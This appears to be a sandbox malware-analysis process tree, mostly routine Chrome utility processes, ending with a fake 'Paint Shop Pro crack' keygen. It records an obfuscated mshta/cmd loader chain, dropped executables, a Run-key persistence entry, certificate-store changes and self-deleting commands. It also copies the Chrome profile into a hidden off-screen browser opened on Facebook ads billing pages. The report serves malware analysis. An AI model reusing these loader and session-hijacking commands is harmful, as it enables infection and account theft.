"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6096 /prefetch:8
2⤵
PID:4740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6148 /prefetch:8
2⤵
PID:4792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6416 /prefetch:8
2⤵
PID:4812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6560 /prefetch:8
2⤵
PID:4880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6696 /prefetch:8
2⤵
PID:4916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6744 /prefetch:8
2⤵
PID:4928

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
2⤵
PID:4988

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff608dda890,0x7ff608dda8a0,0x7ff608dda8b0
3⤵
PID:5016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6548 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6140 /prefetch:8
2⤵
PID:5084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:8
2⤵
PID:4144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6404 /prefetch:8
2⤵
PID:4156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6696 /prefetch:8
2⤵
PID:4328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5680 /prefetch:8
2⤵
PID:4492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6708 /prefetch:8
2⤵
PID:4556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6912 /prefetch:8
2⤵
PID:4580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6924 /prefetch:8
2⤵
PID:1836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5780 /prefetch:8
2⤵
PID:1532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7072 /prefetch:8
2⤵
PID:4824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5600 /prefetch:8
2⤵
PID:4932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5444 /prefetch:8
2⤵
PID:4740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5460 /prefetch:8
2⤵
PID:4956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6664 /prefetch:8
2⤵
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7216 /prefetch:8
2⤵
PID:4568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7364 /prefetch:8
2⤵
PID:5088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7500 /prefetch:8
2⤵
PID:4140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7632 /prefetch:8
2⤵
PID:1404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7480 /prefetch:8
2⤵
PID:4888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
2⤵
PID:4592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4336 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3756 /prefetch:8
2⤵
PID:4204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4196 /prefetch:8
2⤵
PID:4152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6920 /prefetch:8
2⤵
PID:2760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6268 /prefetch:8
2⤵
PID:4828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4160 /prefetch:8
2⤵
PID:4980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5220 /prefetch:8
2⤵
PID:4840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5696 /prefetch:8
2⤵
PID:4556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4300 /prefetch:8
2⤵
PID:1572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4276 /prefetch:8
2⤵
PID:4992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6748 /prefetch:8
2⤵
PID:1404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4092 /prefetch:8
2⤵
PID:4808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7152 /prefetch:8
2⤵
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7116 /prefetch:1
2⤵
PID:2152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
2⤵
PID:4196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6048 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3648 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4188 /prefetch:8
2⤵
PID:2740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6976 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 /prefetch:8
2⤵
PID:5092

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:584

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4460

C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe"
1⤵
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:3728

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4644

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:3832

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:1744

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
keygen-step-5.exe
3⤵
- Executes dropped EXE
PID:3752

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIpT:cLose ( CReatEoBjeCt ( "wscRIpT.SheLL" ). RuN("C:\Windows\system32\cmd.exe /C Type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If """"== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -Im ""%~NXa"" /f > NuL ", 0 ) )
4⤵
PID:4652

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If ""== "" for %a In ("C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe") do taskkill -Im "%~NXa" /f > NuL
5⤵
PID:4952

C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe
NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518
6⤵
- Executes dropped EXE
PID:4708

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIpT:cLose ( CReatEoBjeCt ( "wscRIpT.SheLL" ). RuN("C:\Windows\system32\cmd.exe /C Type ""C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe"" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If ""/pfztvgOHczW8518 ""== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe"" ) do taskkill -Im ""%~NXa"" /f > NuL ", 0 ) )
7⤵
PID:5084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If "/pfztvgOHczW8518 "== "" for %a In ("C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe") do taskkill -Im "%~NXa" /f > NuL
8⤵
PID:4256

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" .\xUHTZND.6T /U -S
7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:5056

C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "keygen-step-5.exe" /f
6⤵
- Kills process with taskkill
PID:3800

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:5088

C:\Users\Admin\AppData\Roaming\5341.tmp.exe
"C:\Users\Admin\AppData\Roaming\5341.tmp.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3828

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\5341.tmp.exe"
5⤵
PID:5988

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:3844

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4876

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
5⤵
- Executes dropped EXE
PID:4700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 272
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
4⤵
PID:2312

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:2316

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:2872

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:3228

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:680

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4968

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Free.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Free.exe"
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4716

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
5⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3836

C:\ProgramData\1025963.exe
"C:\ProgramData\1025963.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4160

C:\ProgramData\2918611.exe
"C:\ProgramData\2918611.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1972

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
6⤵
- Executes dropped EXE
PID:296

C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
4⤵
- Executes dropped EXE
- Drops Chrome extension
PID:2040

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:4652

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:4108

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
5⤵
- Enumerates system info in registry
PID:3000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffcca524f50,0x7ffcca524f60,0x7ffcca524f70
6⤵
PID:4076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1920 /prefetch:8
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1568 /prefetch:2
6⤵
PID:2200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2180 /prefetch:8
6⤵
PID:2576

C:\Program Files\Google\Chrome\Application\chrome.exe
